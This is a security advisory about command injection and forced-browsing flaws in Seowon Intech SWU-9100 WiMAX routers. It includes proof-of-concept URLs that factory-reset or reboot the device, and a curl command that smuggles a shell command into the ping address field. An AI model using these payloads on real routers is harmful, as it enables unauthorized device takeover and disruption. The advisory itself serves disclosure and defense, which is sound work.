Software Engineering Institute

Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities.

CVE-2013-7183 - CWE-425: Direct Request ('Forced Browsing')
A remote unauthenticated attacker may factory reset or reboot the router by visiting a specific URL.
http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply

CVE-2013-7179 - CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
The following is a proof-of-concept for the command injection vulnerability.
curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping" "http://[IP_Router]/cgi-bin/diagnostic.cgi" > /dev/null

The CVSS score below is for CVE-2013-7179.

A remote unauthenticated attacker may be able to inject commands, reboot, or may perform a factory reset on the device.

We are currently unaware of a practical solution to this problem. Please consider the following workaround.

Restrict Access

Enable firewall rules so only trusted sources may access the device. Do not allow web administration from the WAN interface.